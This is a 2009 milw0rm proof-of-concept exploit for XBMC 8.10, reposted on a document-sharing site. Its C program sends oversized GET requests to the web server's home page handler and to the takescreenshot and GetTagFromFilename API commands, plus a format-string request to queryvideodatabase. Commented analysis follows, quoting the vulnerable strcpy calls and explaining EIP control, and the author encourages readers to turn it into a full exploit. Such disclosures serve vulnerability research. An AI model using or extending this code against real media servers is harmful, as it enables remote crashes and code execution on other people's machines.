XBMC 8.10 GET Requests Multiple Remote Buffer Overflow PoC

Document Sample
XBMC 8.10 GET Requests Multiple Remote Buffer Overflow PoC Powered By Docstoc
					                       XBMC 8.10 GET Requests Multiple Remote Buffer Overflow PoC   Page 1/8
  1    /*
  2    XBMC multiple remote buffer overflow vulnerabilities.
  3
  4    XBMC is an award winning media center application for
  5    Linux, Mac OS X, Windows and XBox. The ultimate hub
  6    for all your media, XBMC is easy to use, looks slick,
  7    and has a large helpful community.XBMC has won many
  8    awards.
  9
  10   Affected version: XBMC 8.10 Atlantis
  11   Tested on: Windows xpsp3 and linux unbuntu 8.10
  12   Venders web site : http://xbmc.org/
  13   Release date:April the 1st 2009
  14
  15   Credits go to n00b for finding the buffer overflow
  16   and writing simple yet effective poc code.
  17   Shout’s to every one that knows me and have helped over
  18   the years.
  19
  20   Please if u do wish to write a exploit for the buffer
  21   overflow please give credits.
  22   also you will have to filter the bad chars from
  23   shellcode if you do wish to write exploit for the
  24   voulnrabilitys in this advisory.
  25
  26   −−−−−−−−−−
  27   Disclaimer
  28   −−−−−−−−−−
  29   The information in this advisory and any of its
  30   demonstrations is provided "as is" without any
  31   warranty of any kind.
  32
  33   I am not liable for any direct or indirect damages
  34   caused as a result of using the information or
  35   demonstrations provided in any part of this advisory.
  36   Educational use only..!!
  37
  38   You can call by my blog to leave comments and feed back
  39   and ask any questions you would like.Should be up
  40   and runing in a few days.
  41
  42   [−−]
  43   http://n00b−n00b.blogspot.com/
  44   [−−]
  45
  46   This poc code was writen on linux using gcc−4.* to compile.
  47   */
  48
  49   #include   <stdio.h>
  50   #include   <sys/socket.h>
  51   #include   <arpa/inet.h>
  52   #include   <stdlib.h>
n00b                                                                                04/01/2009
                      XBMC 8.10 GET Requests Multiple Remote Buffer Overflow PoC   Page 2/8
  53    #include <string.h>
  54    #include <unistd.h>
  55    #include <netinet/in.h>
  56
  57    /*Just enough recived buffer to allow for the server banner!!*/
  58
  59    #define BUFFSIZE 32
  60
  61
  62    void error(char *mess)
  63    {
  64        perror(mess);
  65        exit(1);
  66    }
  67
  68    int main(int argc, char *argv[])
  69    {
  70        int sock;
  71        int input;
  72        struct sockaddr_in http_client;
  73        char buffer[BUFFSIZE];
  74
  75        /*You may need to add more buffer on linux versions!!
  76          on windows its <1010> bytes to own eip next 4 bytes
  77          are loaded into the $esp register.*/
  78        char buffer1[1500];
  79
  80       unsigned int http_len;
  81       int received = 0;
  82
  83       /* If there is more than 2 arguments passed print usage!!*/
  84       if (argc != 3)
  85       {
  86           fprintf(stderr,"USAGE: Server_ip port\n");
  87           exit(1);
  88       }
  89
  90       /* Create socket */
  91       if ((sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
  92       {
  93           error("Cant create socket");
  94       }
  95
  96
  97       /* Construct sockaddr */
  98       memset(&http_client, 0, sizeof(http_client));
  99       http_client.sin_family = AF_INET;
  100      http_client.sin_addr.s_addr = inet_addr(argv[1]);
  101      http_client.sin_port = htons(atoi(argv[2]));
  102
  103      /* Establish connection */
  104      if (connect(sock,
n00b                                                                               04/01/2009
                     XBMC 8.10 GET Requests Multiple Remote Buffer Overflow PoC                                      Page 3/8
  105                   (struct sockaddr *) &http_client,
  106                   sizeof(http_client)) < 0)
  107   {
  108        error("Failed to connect with remote host");
  109   }
  110
  111   /*We need to Construct all the voulnrable request togeather*/
  112   memset( buffer1, 0x41, sizeof(buffer1) − 1 );
  113
  114   printf( "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n" );
  115   printf( "XBMC remote buffer overflow poc code by n00b !!\n" );
  116   printf( "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n" );
  117   printf( "[1]. Get request buffer overflow poc !!\n" );
  118   printf( "[2]. Get /xbmcHttp?command=takescreenshot buffer overflow !!\n" );
  119   printf( "[3]. Get /xbmcHttp?command=GetTagFromFilename buffer overflow !!\n" );
  120   printf( "[4]. queryvideodatabase possible format string poc !!\n" );
  121   printf( "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n" );
  122   printf( "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n" );
  123   printf( "[5]. Cancel and quit application !!\n" );
  124   printf( "−−−−−−−−−−−−−−−−−−−−−−\n" );
  125   printf( "Pick your http request: " );
  126   scanf( "%d", &input );
  127   switch ( input )
  128   {
  129   case 1:
  130       memcpy ( buffer1, "GET /", 5);
  131       memcpy ( buffer1 +(sizeof(buffer1) − 1) − 21, ".asp HTTP/1.1\r\n\r\n", 21);
  132       break;
  133   case 2:
  134       memcpy ( buffer1, "GET /xbmcCmds/xbmcHttp?command=takescreenshot(", 46);
  135       memcpy ( buffer1 +(sizeof(buffer1) − 1) − 41, ".jpg;false;0;300;200;90) HTTP/1.1\r\n\r\n", 41);
  136       break;
  137   case 3:
  138       memcpy ( buffer1, "GET /xbmcCmds/xbmcHttp?command=GetTagFromFilename(C:/", 53);
  139       memcpy ( buffer1 +(sizeof(buffer1) − 1) − 23, ".mp3) HTTP/1.1\r\n\r\n", 23);
  140       break;
  141   case 4:
  142       memcpy ( buffer1, "GET /xbmcCmds/xbmcHttp?command=queryvideodatabase(%s%s%s%s) HTTP/1.1\r\n\r\n", 76);
  143       break;
  144   case 5:
  145       exit(0);
  146       break;
  147   }
  148
  149
  150   /* Send our get request to the server*/
  151   http_len = strlen(buffer1);
  152   if (send(sock, buffer1, http_len, 0) != http_len)
  153   {
  154       error("No byte’s where sent to remote host check Get request !!");
  155   }
  156

n00b                                                                                                                 04/01/2009
                         XBMC 8.10 GET Requests Multiple Remote Buffer Overflow PoC              Page 4/8
  157
  158       /* Receive the current state of the server*/
  159       fprintf(stdout, "Received: ");
  160       while (received < http_len)
  161       {
  162           int bytes = 0;
  163           if ((bytes = recv(sock, buffer, BUFFSIZE−1, 0)) < 1)
  164           {
  165               error("Was the banner received?? if no banner exploit was successfull!!");
  166           }
  167           received += bytes;
  168           buffer[bytes] = ’\0’;
  169           fprintf(stdout, buffer);
  170       }
  171
  172       fprintf(stdout, "\n");
  173       close(sock);
  174       exit(0);
  175   }
  176
  177
  178   /*
  179   A basic run down of the bugs found with a basic discription.!!
  180
  181
  182   (1)..(Get request WebsHomePageHandler buffer overflow)..
  183
  184   I was able to track down most of the vulnerable code.All this info
  185   was collected on a window’s system.
  186
  187   The first buffer overflow i found in the xbmc application all is
  188   required was for me to make a simple get request by adding 1033 bytes
  189   of user supplied data to the request.We are now able to gain control of the
  190   $eip register and the next four bytes on the stack is where our $esp register
  191   is pointing.
  192
  193
  194   −−snip−−
  195
  196
  197   Source of WebsHomePageHandler..\XBMC\xbmc\lib\libGoAhead\WebServer.cpp
  198
  199
  200
  201
  202            Home page handler
  203
  204   static int websHomePageHandler(webs_t wp, char_t *urlPrefix, char_t *webDir,
  205   int arg, char_t *url, char_t *path, char_t *query)
  206   {
  207
  208           If the empty or "/" URL is invoked, redirect default URLs to the home page
n00b                                                                                             04/01/2009
                      XBMC 8.10 GET Requests Multiple Remote Buffer Overflow PoC   Page 5/8
  209
  210           char dir[1024];
  211           char files[][20] = {
  212                           {"index.html"},
  213                           {"index.htm"},
  214                           {"home.htm"},
  215                           {"home.html"},
  216                           {"default.asp"},
  217                           {"home.asp"},
  218                           {’\0’ }
  219                       };
  220
  221
  222
  223
  224           strcpy(dir, websGetDefaultDir());
  225           strcat(dir, path);
  226           for(u_int pos = 0; pos < strlen(dir); pos++)
  227   if (dir[pos] == ’/’) dir[pos] = ’\\’;
  228
  229   DWORD attributes = GetFileAttributes(dir);
  230   if (FILE_ATTRIBUTE_DIRECTORY == attributes)
  231   {
  232   int i = 0;
  233   char buf[1024];
  234   while (files[i][0])
  235   {
  236   strcpy(buf, dir);
  237   if (buf[strlen(buf)−1] != ’\\’) strcat(buf, "\\");
  238   strcat(buf, files[i]);
  239
  240   if (!access(buf, 0))
  241   {
  242   strcpy(buf, path);
  243   if (path[strlen(path)−1] != ’/’) strcat(buf, "/");
  244   strcat(buf, files[i]);
  245   websRedirect(wp, buf);
  246   return 1;
  247   }
  248   i++;
  249   }
  250
  251
  252   −−snip−−
  253
  254
  255   the next set of voulnrabilitys are exploited through
  256   the "Web Server HTTP API".
  257   more information can be read at the following link.
  258   I wrote a simple fuzzer and fuzzed all the commands that
  259   where passed through the http requests.
  260

n00b                                                                               04/01/2009
                      XBMC 8.10 GET Requests Multiple Remote Buffer Overflow PoC   Page 6/8
  261
  262   http://xbmc.org/wiki/?title=WebServerHTTP−API
  263
  264
  265   (2)..(takescreenshot remote buffer overflow)..
  266
  267   please visit the above link for more information
  268   on specific command’s.This is also a classic buffer
  269   overflow where we can add a long file name to the
  270   takescreenshot command and pass it to the API.
  271   once again we can over flow the static allocated
  272   buffer on the stack and let us own the application
  273   flow.Thus letting us execute our own supplied data.
  274   Also as a side note to this buffer overflow
  275   there are different registers over wrote.
  276
  277   ...\XBMC\xbmc\cores\DllLoader\exports\emu_msvcrt.cpp
  278
  279   −−snip−−
  280
  281
  282   int dll_open(const char* szFileName, int iMode)
  283     {
  284       char str[XBMC_MAX_PATH];
  285
  286       // move to CFile classes
  287       if (strncmp(szFileName, "\\Device\\Cdrom0", 14) == 0)
  288       {
  289         // replace "\\Device\\Cdrom0" with "D:"
  290         strcpy(str, "D:");
  291         strcat(str, szFileName + 14);
  292       }
  293       else strcpy(str, szFileName);
  294
  295       CFile* pFile = new CFile();
  296       bool bBinary = false;
  297       if (iMode & O_BINARY)
  298         bBinary = true;
  299       bool bWrite = false;
  300       if ((iMode & O_RDWR) || (iMode & O_WRONLY))
  301         bWrite = true;
  302       bool bOverwrite=false;
  303       if ((iMode & _O_TRUNC) || (iMode & O_CREAT))
  304         bOverwrite = true;
  305       // currently always overwrites
  306       bool bResult;
  307       if (bWrite)
  308         bResult = pFile−>OpenForWrite(_P(str), bBinary, bOverwrite);
  309       else
  310         bResult = pFile−>Open(_P(str), bBinary);
  311       if (bResult)
  312       {
n00b                                                                               04/01/2009
                        XBMC 8.10 GET Requests Multiple Remote Buffer Overflow PoC        Page 7/8
  313           EmuFileObject* object = g_emuFileWrapper.RegisterFileObject(pFile);
  314           if (object == NULL)
  315           {
  316             VERIFY(0);
  317             pFile−>Close();
  318             delete pFile;
  319             return −1;
  320           }
  321           return g_emuFileWrapper.GetDescriptorByStream(&object−>file_emu);
  322         }
  323         delete pFile;
  324         return −1;
  325     }
  326
  327   −−snip−−
  328
  329   We also know that szFileName is defind in a headerfile with
  330   1024 bytes staticaly allocated.So if we passs more the 1024 byte’s we can cause
  331   stack corruption and over write the $eip also give’s us a choice of registers
  332   we can use for our shell code.
  333
  334
  335
  336   (3)..(GetTagFromFilename remote buffer overflow)..
  337
  338   The buffer over flow is when parsing a id3 tag
  339   the difference is the registers that are over wrote
  340   at the time of access violation are as follow’s.Im not
  341   going to list all the source for all the exceptions.
  342   This poc is big enough already with out adding more
  343   information and its simple to set up XBMC and compile
  344   on your own machine..
  345
  346
  347
  348   (4)..(Sqlite queryvideodatabase)..
  349
  350   Just results in denial of service no more information available
  351   maybe ill look more into sqllite3 in the future.
  352
  353   [−−]
  354   /xbmcCmds/xbmcHttp?command=queryvideodatabase(%s%s%s%s)
  355   [−−]
  356
  357   All the above vulnerability’s where tested on linux and windows
  358   On linux unbuntu 8.10 using strace to debug.And on windows
  359   i used visual c++ express 2008.This poc code is just a simple
  360   poc code to show the vulnerability’s i found within the XBMC
  361   application.
  362
  363   it started off as closed source analysis.Although
  364   the application was tested there are still a lot of other
n00b                                                                                      04/01/2009
                      XBMC 8.10 GET Requests Multiple Remote Buffer Overflow PoC   Page 8/8
  365   possibility for exploitation.Even the login for the web server
  366   could be vulnerable to a buffer overflow.
  367
  368   Also worth a mention is i could take controll over the XBMC
  369   web server and there would be no error messages or any thing to
  370   sugest that the server had been took offline but it carrys on as
  371   normal the rest of xbmc stays the same with out any changes.
  372   It looks like it just terminates the thread and leaving the
  373   rest of the application intact and continues to run
  374   like normal.
  375
  376
  377   */
  378
  379   // milw0rm.com [2009−04−01]




n00b                                                                               04/01/2009

				
DOCUMENT INFO
Shared By:
Categories:
Stats:
views:26
posted:5/23/2010
language:English
pages:8